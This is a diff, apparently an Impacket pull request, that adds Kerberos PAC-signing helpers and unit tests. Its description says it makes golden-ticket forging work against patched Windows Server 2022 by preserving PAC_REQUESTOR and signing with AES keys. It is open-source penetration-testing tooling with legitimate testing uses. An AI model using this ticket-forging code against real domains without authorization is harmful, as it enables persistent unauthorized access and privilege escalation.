+        if aes_key is None:
+            raise Exception('Missing AES key for %s checksum' % checksum_name)
+        return checksum_function, Key(Enctype.AES256, aes_key)
+    if signature_type == constants.ChecksumTypes.hmac_sha1_96_aes128.value:
+        if aes_key is None:
+            raise Exception('Missing AES key for %s checksum' % checksum_name)
+        return checksum_function, Key(Enctype.AES128, aes_key)
+    if signature_type == constants.ChecksumTypes.hmac_md5.value:
+        if nt_hash is None:
+            raise Exception('Missing NT hash for %s checksum' % checksum_name)
+        return checksum_function, Key(Enctype.RC4, nt_hash)
+
+    raise Exception('Invalid %s checksum type 0x%x' % (checksum_name, signature_type))
+
+
+def sign_pac(pac_infos, aes_key=None, nt_hash=None, buffer_order=None,
+             checksum_salt=constants.KERB_NON_KERB_CKSUM_SALT, infer_aes_signature_type=False):
+    if PAC_SERVER_CHECKSUM not in pac_infos:
+        raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
+    if PAC_PRIVSVR_CHECKSUM not in pac_infos:
+        raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
+
+    aes_key = _coerce_hex_key(aes_key)
+    nt_hash = _coerce_hex_key(nt_hash)
+
+    server_checksum = PAC_SIGNATURE_DATA(pac_infos[PAC_SERVER_CHECKSUM])
+    privsvr_checksum = PAC_SIGNATURE_DATA(pac_infos[PAC_PRIVSVR_CHECKSUM])
+
+    server_checksum['SignatureType'] = _normalize_pac_checksum_type(
+        server_checksum['SignatureType'], len(bytes(server_checksum['Signature'])), aes_key, infer_aes_signature_type)
+    privsvr_checksum['SignatureType'] = _normalize_pac_checksum_type(
+        privsvr_checksum['SignatureType'], len(bytes(privsvr_checksum['Signature'])), aes_key, infer_aes_signature_type)
+
+    server_checksum['Signature'] = b'\x00' * len(bytes(server_checksum['Signature']))
+    privsvr_checksum['Signature'] = b'\x00' * len(bytes(privsvr_checksum['Signature']))
+
+    pac_infos[PAC_SERVER_CHECKSUM] = server_checksum.getData()
+    pac_infos[PAC_PRIVSVR_CHECKSUM] = privsvr_checksum.getData()
+
+    pac_type = build_pac_type(pac_infos, buffer_order=buffer_order)
+    blob_to_checksum = pac_type.getData()
+
+    server_checksum_function, server_key = _get_checksum_context(
+        server_checksum['SignatureType'], aes_key, nt_hash, 'Server')
+    privsvr_checksum_function, privsvr_key = _get_checksum_context(
+        privsvr_checksum['SignatureType'], aes_key, nt_hash, 'Priv')
+
+    server_checksum['Signature'] = server_checksum_function.checksum(server_key, checksum_salt, blob_to_checksum)
+    privsvr_checksum['Signature'] = privsvr_checksum_function.checksum(
+        privsvr_key, checksum_salt, server_checksum['Signature'])
+
+    pac_infos[PAC_SERVER_CHECKSUM] = server_checksum.getData()
+    pac_infos[PAC_PRIVSVR_CHECKSUM] = privsvr_checksum.getData()
+
+    return build_pac_type(pac_infos, buffer_order=buffer_order)

--- a/tests/misc/test_pac_helpers.py
+++ b/tests/misc/test_pac_helpers.py
@@ -1,0 +1,86 @@
+#!/usr/bin/env python
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright Fortra, LLC and its affiliated companies
+#
+# All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+
+import unittest
+
+from impacket.krb5 import constants, pac
+
+
+class TestPacHelpers(unittest.TestCase):
+
+    def test_build_pac_type_uses_explicit_buffer_order(self):
+        pac_infos = {
+            pac.PAC_SERVER_CHECKSUM: b'server',
+            pac.PAC_LOGON_INFO: b'logon',
+            pac.PAC_CLIENT_INFO_TYPE: b'client',
+            pac.PAC_PRIVSVR_CHECKSUM: b'priv',
+        }
+
+        pac_type = pac.build_pac_type(
+            pac_infos,
+            buffer_order=[
+                pac.PAC_LOGON_INFO,
+                pac.PAC_CLIENT_INFO_TYPE,
+                pac.PAC_SERVER_CHECKSUM,
+                pac.PAC_PRIVSVR_CHECKSUM,
+            ],
+        )
+
+        buffer_blob = pac_type['Buffers']
+        offset = 0
+        buffer_types = []
+        for _ in range(pac_type['cBuffers']):
+            info_buffer = pac.PAC_INFO_BUFFER(buffer_blob[offset:])
+            buffer_types.append(info_buffer['ulType'])
+            offset += len(info_buffer)
+
+        self.assertEqual(buffer_types, [
+            pac.PAC_LOGON_INFO,
+            pac.PAC_CLIENT_INFO_TYPE,
+            pac.PAC_SERVER_CHECKSUM,
+            pac.PAC_PRIVSVR_CHECKSUM,
+        ])
+
+    def test_sign_pac_infers_aes128_checksum_type_from_key_length(self):
+        server_checksum = pac.PAC_SIGNATURE_DATA()
+        server_checksum['SignatureType'] = constants.ChecksumTypes.hmac_md5.value
+        server_checksum['Signature'] = b'\x00' * 12
+
+        priv_checksum = pac.PAC_SIGNATURE_DATA()
+        priv_checksum['SignatureType'] = constants.ChecksumTypes.hmac_md5.value
+        priv_checksum['Signature'] = b'\x00' * 12
+
+        pac_infos = {
+            pac.PAC_LOGON_INFO: b'logon-info',
+            pac.PAC_CLIENT_INFO_TYPE: b'client-info',
+            pac.PAC_SERVER_CHECKSUM: server_checksum.getData(),
+            pac.PAC_PRIVSVR_CHECKSUM: priv_checksum.getData(),
+        }
+
+        pac_type = pac.sign_pac(
+            pac_infos,
+            aes_key='41' * 16,
+            infer_aes_signature_type=True,
+        )
+
+        updated_server = pac.PAC_SIGNATURE_DATA(pac_infos[pac.PAC_SERVER_CHECKSUM])
+        updated_priv = pac.PAC_SIGNATURE_DATA(pac_infos[pac.PAC_PRIVSVR_CHECKSUM])
+
+        self.assertEqual(updated_server['SignatureType'], constants.ChecksumTypes.hmac_sha1_96_aes128.value)
+        self.assertEqual(updated_priv['SignatureType'], constants.ChecksumTypes.hmac_sha1_96_aes128.value)
+        self.assertEqual(len(bytes(updated_server['Signature'])), 12)
+        self.assertEqual(len(bytes(updated_priv['Signature'])), 12)
+        self.assertEqual(pac_type['cBuffers'], 4)
+
+
+if __name__ == '__main__':
+    unittest.main()


### PR DESCRIPTION
Two bugs fixed:

1. makeGolden() hardcoded exactly 4 PAC buffers, discarding all others.
   Windows Server 2022 with CVE-2021-42287 patches requires PAC_REQUESTOR (type 18) to be present. Stripping it causes KDC_ERR_TGT_REVOKED.
   Fix: preserve all original PAC buffers, only update modified ones.

2. getKerberosTGT() called with aesKey=None hardcoded, ignoring -aesKey.
   Fix: pass aesKey, try AES first then fall back to RC4.

Additional improvements:
- Auto-retry golden ticket with AES if RC4 is rejected by KDC
- Fix signature zeroing to use actual length instead of hardcoded 12/16
- Updated help text with AES key usage examples

Tested against Windows Server 2022 Build 20348. Backward compatible.